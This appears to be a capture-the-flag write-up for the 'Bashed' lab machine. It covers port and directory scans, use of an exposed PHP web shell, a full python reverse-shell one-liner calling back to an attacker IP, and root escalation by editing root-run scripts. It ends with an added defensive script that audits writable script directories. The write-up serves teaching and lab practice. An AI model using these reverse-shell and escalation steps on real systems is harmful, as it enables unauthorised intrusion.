Ping
ping 10.10.10.68

Nmap Default Scan
nmap 10.10.10.68 -oN dnmap
We have only one open port.
All-Port Scan
nmap 10.10.10.68 -sC -sV -p- --open -T5 -oN anmap
No other ports found.
On Port 80

Gobuster Scan
gobuster dir -u http://10.10.10.68/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,html,txt,bak,conf -s 200,204,301,302,307,403 --status-codes-blacklist "" -k -o gobuster.txt

/dev has some PHP files.

Got a semi-interactive shell from phpbash.min.php.

Will get a proper reverse shell, so will check for nc and python.
which nc
which python

We can get a reverse shell using both nc and python; I’m going with python.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.41",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
rlwrap nc -nvlp 443
Got it…!
Will upgrade the shell
python3 -c 'import pty; pty.spawn("/bin/bash")'

Got user.txt in the home directory of user arrexel.

Will jump to Privilege Escalation…!
Will check sudo permissions
sudo -l

So we can switch to scriptmanager
sudo -u scriptmanager -i

So scriptmanager has full and root access to the scripts directory.
ls -la

Let's navigate to the scripts directory and modify the code or add new code for a reverse shell as root.

Then execute the code to get reverse shell as root
python test.py
rlwrap nc -nvlp 443

Got root.txt in root directory
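
An added example, not part of the original write-up: a defender-side audit for the misconfiguration used above, a scripts directory that a low-privileged account can modify while its contents run as root. The function name, the trusted-UID parameter and the sample tree are assumptions constructed for illustration.

```python
import os
import stat
import tempfile

def audit_script_dir(path, trusted_uids=frozenset({0})):
    """Return (path, reason) findings for entries a non-trusted user could modify."""
    findings = []
    # Include the directory itself: write access to it allows replacing any file inside.
    targets = [path]
    for root, dirs, files in os.walk(path):
        targets += [os.path.join(root, name) for name in dirs + files]
    for target in targets:
        st = os.lstat(target)
        if stat.S_ISLNK(st.st_mode):
            findings.append((target, "symlink (target may be outside the audited tree)"))
            continue
        if st.st_uid not in trusted_uids:
            findings.append((target, "owned by untrusted uid %d" % st.st_uid))
        if st.st_mode & stat.S_IWGRP:
            findings.append((target, "group-writable"))
        if st.st_mode & stat.S_IWOTH:
            findings.append((target, "world-writable"))
    return findings

def demo():
    """Audit a constructed tree three ways; returns (clean, untrusted_owner, loose)."""
    me = os.getuid()
    with tempfile.TemporaryDirectory() as d:
        os.chmod(d, 0o755)
        script = os.path.join(d, "test.py")  # constructed sample script
        with open(script, "w") as f:
            f.write("print('hello')\n")
        os.chmod(script, 0o644)
        # Owner is trusted and modes are tight: nothing to report.
        clean = audit_script_dir(d, trusted_uids={me})
        # Same tree judged with the owner NOT trusted, as when a service
        # account owns a directory whose scripts root executes.
        untrusted_owner = audit_script_dir(d, trusted_uids={0} if me != 0 else set())
        # Trusted owner, but the script's mode lets others rewrite it.
        os.chmod(script, 0o666)
        loose = audit_script_dir(d, trusted_uids={me})
    return clean, untrusted_owner, loose

if __name__ == "__main__":
    for label, result in zip(("clean", "untrusted owner", "loose mode"), demo()):
        print(label, result)
```

Run it as root against any directory that cron jobs or services execute scripts from; every finding is a path where a non-root account can change what root runs.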

Done with Bashed…:)